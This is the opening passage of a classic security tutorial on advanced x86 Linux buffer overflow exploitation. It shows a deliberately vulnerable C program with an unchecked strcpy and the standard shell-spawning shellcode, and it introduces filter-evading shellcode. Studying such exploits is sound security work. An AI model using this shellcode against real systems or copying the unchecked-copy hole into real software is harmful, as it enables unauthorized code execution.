 Advanced buffer overflow exploit


 Written by Taeho Oh ( ohhara@postech.edu )
----------------------------------------------------------------------------
Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
----------------------------------------------------------------------------


1. Introduction
 Nowadays there are many buffer overflow exploit codes. The early buffer
overflow exploits only spawned a shell ( executed /bin/sh ). However, many of
today's exploit codes have much nicer features: for example, passing through
character filters, opening a socket, breaking out of a chroot, and so on.
This paper attempts to explain these advanced buffer overflow exploit skills
under Intel x86 Linux.

2. What do you have to know before reading?
 You have to know assembly language, C, and Linux. Of course, you also have
to know what a buffer overflow is. You can find that background in Phrack
49-14 ( Smashing The Stack For Fun And Profit by Aleph1 ). It is a wonderful
paper on buffer overflows and I highly recommend you read it before reading
this one.

3. Pass through filtering
 There are many programs which have buffer overflow problems. Why are not all
of them exploited? Because even if a program has a buffer overflow condition,
it can be hard to exploit. In many cases the reason is that the program
filters some characters or converts characters into other characters before
the overflow happens, so the shellcode bytes do not arrive intact. If the
program filters out all non-printable characters it is very hard to exploit.
If the program filters only some characters, you can pass through the filter
by writing shellcode that avoids those characters. :)

3.1 The example vulnerable program

vulnerable1.c
----------------------------------------------------------------------------
#include<string.h>
#include<ctype.h>

int main(int argc,char **argv)
{
	char buffer[1024];
	int i;
	if(argc>1)
	{
		/* the "filter": every lowercase letter in the argument becomes uppercase */
		for(i=0;i<strlen(argv[1]);i++)
			argv[1][i]=toupper((unsigned char)argv[1][i]);
		/* no length check: an argument longer than 1024 bytes overflows buffer */
		strcpy(buffer,argv[1]);
	}
	return 0;
}
----------------------------------------------------------------------------

 This vulnerable program converts every lowercase letter in the user input
into a capital letter before copying the input into buffer. Therefore, you
have to make a shellcode which doesn't contain any lowercase letters ( bytes
0x61 - 0x7a ). How can you do that? The normal shellcode has to reference the
character string "/bin/sh", which contains lowercase letters, and some of the
instruction bytes themselves may also happen to be lowercase letters.
However, you can still exploit this. :)

3.2 Modify the normal shellcode
 Almost all buffer overflow exploit code uses the shellcode below ( it is the
one from Aleph1's paper ). Now you have to remove all lowercase letters from
the shellcode. Of course, the new shellcode still has to execute a shell.

normal shellcode
----------------------------------------------------------------------------
char shellcode[]=
	"\xeb\x1f"                      /* jmp 0x1f              */
	"\x5e"                          /* popl %esi             */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xd8"                      /* movl %ebx,%eax        */
	"\x40"                          /* inc %eax              */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xdc\xff\xff\xff"          /* call -0x24            */
	"/bin/sh";                      /* .string \"/bin/sh\"   */
----------------------------------------------------------------------------

 